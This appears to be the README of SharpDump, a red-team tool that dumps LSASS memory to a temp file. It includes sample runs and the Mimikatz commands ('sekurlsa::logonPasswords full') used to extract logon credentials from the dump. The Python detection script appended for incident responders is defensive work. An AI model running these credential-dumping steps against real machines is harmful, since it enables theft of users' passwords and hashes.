SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality. The MiniDumpWriteDump Win32 API call is used to create a minidump for the process ID specified (LSASS by default) to C:\Windows\Temp\debug.out, GZipStream is used to compress the dump to C:\Windows\Temp\debug.bin (.gz format), and the original minidump file is deleted.
@harmj0y is the primary author of this port.
SharpDump is licensed under the BSD 3-Clause license.
Dump LSASS:
C:\Temp>SharpDump.exe
[*] Dumping lsass (808) to C:\WINDOWS\Temp\debug808.out
[+] Dump successful!
[*] Compressing C:\WINDOWS\Temp\debug808.out to C:\WINDOWS\Temp\debug808.bin gzip file
[*] Deleting C:\WINDOWS\Temp\debug808.out
[+] Dumping completed. Rename file to "debug808.gz" to decompress.
[*] Operating System : Windows 10 Enterprise N
[*] Architecture : AMD64
[*] Use "sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full" on the same OS/arch
Dump a specific process ID:
C:\Temp>SharpDump.exe 8700
[*] Dumping notepad++ (8700) to C:\WINDOWS\Temp\debug8700.out
[+] Dump successful!
[*] Compressing C:\WINDOWS\Temp\debug8700.out to C:\WINDOWS\Temp\debug8700.bin gzip file
[*] Deleting C:\WINDOWS\Temp\debug8700.out
[+] Dumping completed. Rename file to "debug8700.gz" to decompress.
We are not planning on releasing binaries for SharpDump, so you will have to compile it yourself :)
SharpDump has been built against .NET 3.5 and is compatible with Visual Studio 2015 Community Edition. Simply open up the project .sln, choose "release", and build.
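
For incident-response triage, the artifacts described above can be recognized by content rather than by file name: a raw minidump starts with the bytes `MDMP`, and the compressed `.bin` file is a gzip stream whose first decompressed bytes are `MDMP`. The script below is an added example, not part of SharpDump; the function names and the default directory are assumptions chosen for illustration.

```python
import gzip
import re
import sys
import zlib
from pathlib import Path

MDMP_MAGIC = b"MDMP"       # first four bytes of a Windows minidump
GZIP_MAGIC = b"\x1f\x8b"   # first two bytes of a gzip stream
# Names seen in the output above: debug<PID>.out, debug<PID>.bin, debug<PID>.gz
NAME_RE = re.compile(r"^debug\d*\.(out|bin|gz)$", re.IGNORECASE)


def classify(path):
    """Return 'minidump', 'gzip-minidump' or None, judged by content only."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(4)
        if head == MDMP_MAGIC:
            return "minidump"
        if head[:2] == GZIP_MAGIC:
            # Inflate just the first four bytes, never the whole dump.
            with gzip.open(path, "rb") as gz:
                if gz.read(4) == MDMP_MAGIC:
                    return "gzip-minidump"
    except (OSError, EOFError, zlib.error):
        pass  # unreadable, truncated or corrupt file: cannot classify
    return None


def scan(directory):
    """Return [(file name, kind, name matches the debug<PID> pattern)]."""
    findings = []
    for p in sorted(Path(directory).iterdir()):
        kind = classify(p) if p.is_file() else None
        if kind:
            findings.append((p.name, kind, bool(NAME_RE.match(p.name))))
    return findings


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else r"C:\Windows\Temp"
    for name, kind, named in scan(target):
        print(f"{name}: {kind}" + ("  [debug<PID> name]" if named else ""))
```

Because the check reads file content, a dump that has been renamed is still reported; the name flag only indicates that the default naming was left in place.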